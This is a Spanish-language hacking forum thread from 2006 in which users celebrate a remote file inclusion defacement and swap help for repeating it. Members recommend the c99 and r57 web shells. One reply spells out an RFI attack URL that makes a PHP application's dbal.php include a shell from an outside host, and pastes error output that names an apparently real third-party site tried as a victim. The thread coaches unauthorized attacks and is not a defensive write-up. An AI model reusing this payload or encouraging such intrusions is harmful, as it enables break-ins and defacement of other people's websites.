Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 02:21:28
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Mi Primer Rfi Exitoso en 3 minutos XD.. con Video Incluido ;) 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Mi Primer Rfi Exitoso en 3 minutos XD.. con Video Incluido ;)  (Leído 808 veces)
PowaZ0r(ELe)
Recien Llegado
*
Desconectado Desconectado

Ver Perfil
« en: Octubre 27, 2006, 12:08:38 »

Weno este video va dedicado a todos los del foro con sus contribuciones sobre el tema,  mas q nada no borre ninguna cosa dentro de la web, solo puse lo q ven y depue lo borre xq me dio remordimiento xD  Roll Eyes

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion        Ahi descargan el HackWeb1.rar

Enjoy  Wink Cheesy

Pd: Gracias por la notificacion OzX xD
« Última modificación: Octubre 27, 2006, 12:33:08 por PowaZ0r(ELe) » En línea
OzX
Moderación
Gran Colaborador

http://foro.undersecurity.net

Ver Perfil WWW
« Respuesta #1 en: Octubre 27, 2006, 12:24:36 »

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
darthblacky
Visitante
« Respuesta #2 en: Octubre 27, 2006, 04:53:20 »

Si que funciona, a mi lo que me gustaria saber es donde conseguir un shell como el que usas en ese video, pero despues de una semana buscando por los foros no encuentro nada parecido, todos los shells publicados dejaron de funcionar hace tiempo..por cierto buen trabajo Wink
PowaZ0r(ELe)
Recien Llegado
*

Ver Perfil
« Respuesta #3 en: Octubre 27, 2006, 08:46:22 »

Si que funciona, a mi lo que me gustaria saber es donde conseguir un shell como el que usas en ese video, pero despues de una semana buscando por los foros no encuentro nada parecido, todos los shells publicados dejaron de funcionar hace tiempo..por cierto buen trabajo Wink
Gracias Grin, sobre el tema de las shells, en el link que di salen las shells c99 y r57 en .txt, esas las puedes usar  Cheesy Wink

« Última modificación: Octubre 27, 2006, 09:07:57 por PowaZ0r(ELe) » En línea
darthblacky
Visitante
« Respuesta #4 en: Octubre 27, 2006, 01:47:31 »

PowaZor(Ele)
Miembro

Ver Perfil
« Respuesta #5 en: Octubre 27, 2006, 02:02:00 »

« Última modificación: Octubre 27, 2006, 02:08:35 por PowaZor(Ele) » En línea
darthblacky
Visitante
« Respuesta #6 en: Octubre 27, 2006, 02:19:44 »

Gracias tio Cheesy mira los mensajes privados sino te da mas Tongue por cierto el de la foto es hetfield no? O_o
arquimedes
Visitante
« Respuesta #7 en: Octubre 27, 2006, 02:25:53 »

no es por ser antipatico pero lo q se ace con estos videos s crear crea script kiddies a ahora ira corriendo al google a buscar ese tipo de foros.
Pero x lo demas, mu weno el deface
B3Lc3b
Visitante
« Respuesta #8 en: Noviembre 01, 2006, 09:31:14 »

muy buen trabajo, yo intento hacer uno,pero por desgracia al poner la ruta del shell c99.txt? solo me sale el texto , alguien sabe porque?
k4oS
Visitante
« Respuesta #9 en: Noviembre 03, 2006, 04:26:49 »

He estado probando este metodo per cada vez que inserto esto:

includes/dbal.php?eqdkp_root_path=http://miurldemishell..c99.txt?

o me sale una pagina completamente en blanco o trato de buscar otra victima y me sale este error:

Warning: include_once(dbal/mysql.php) [function.include-once]: failed to open stream: No such file or directory in /www_subdomains/playnow.com.au/public_html/pps/includes/dbal.php on line 18

Warning: include_once() [function.include]: Failed opening 'dbal/mysql.php' for inclusion (include_path='.:/usr/local/lib/php') in /www_subdomains/playnow.com.au/public_html/pps/includes/dbal.php on line 18

Fatal error: Class 'SQL_DB' not found in /www_subdomains/playnow.com.au/public_html/pps/includes/dbal.php on line 22

Asi que no se que este haciendo mal o que me puedan decir para hacerlo bien.. Espero me ayuden.. he seguido los pasos segun como estan en el video y nada..

Ayudenme pls... de hecho uso la Shell que estan posteadas aca..

De Antemano Gracias..

k4oS
k4oS
Visitante
« Respuesta #10 en: Noviembre 03, 2006, 04:28:50 »

He estado probando este metodo per cada vez que inserto esto:

includes/dbal.php?eqdkp_root_path=http://LaUrldeMiShell/c99.txt?

o me sale una pagina completamente en blanco o trato de buscar otra victima y me sale este error:

Warning: include_once(dbal/mysql.php) [function.include-once]: failed to open stream: No such file or directory in /www_subdomains/playnow.com.au/public_html/pps/includes/dbal.php on line 18

Warning: include_once() [function.include]: Failed opening 'dbal/mysql.php' for inclusion (include_path='.:/usr/local/lib/php') in /www_subdomains/playnow.com.au/public_html/pps/includes/dbal.php on line 18

Fatal error: Class 'SQL_DB' not found in /www_subdomains/playnow.com.au/public_html/pps/includes/dbal.php on line 22

Asi que no se que este haciendo mal o que me puedan decir para hacerlo bien.. Espero me ayuden.. he seguido los pasos segun como estan en el video y nada..

Ayudenme pls... de hecho uso la Shell que estan posteadas aca..

De Antemano Gracias..

k4oS
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Mi Primer Rfi Exitoso en 3 minutos XD.. con Video Incluido ;) « anterior próximo »
Ir a:  

Ranking-Hits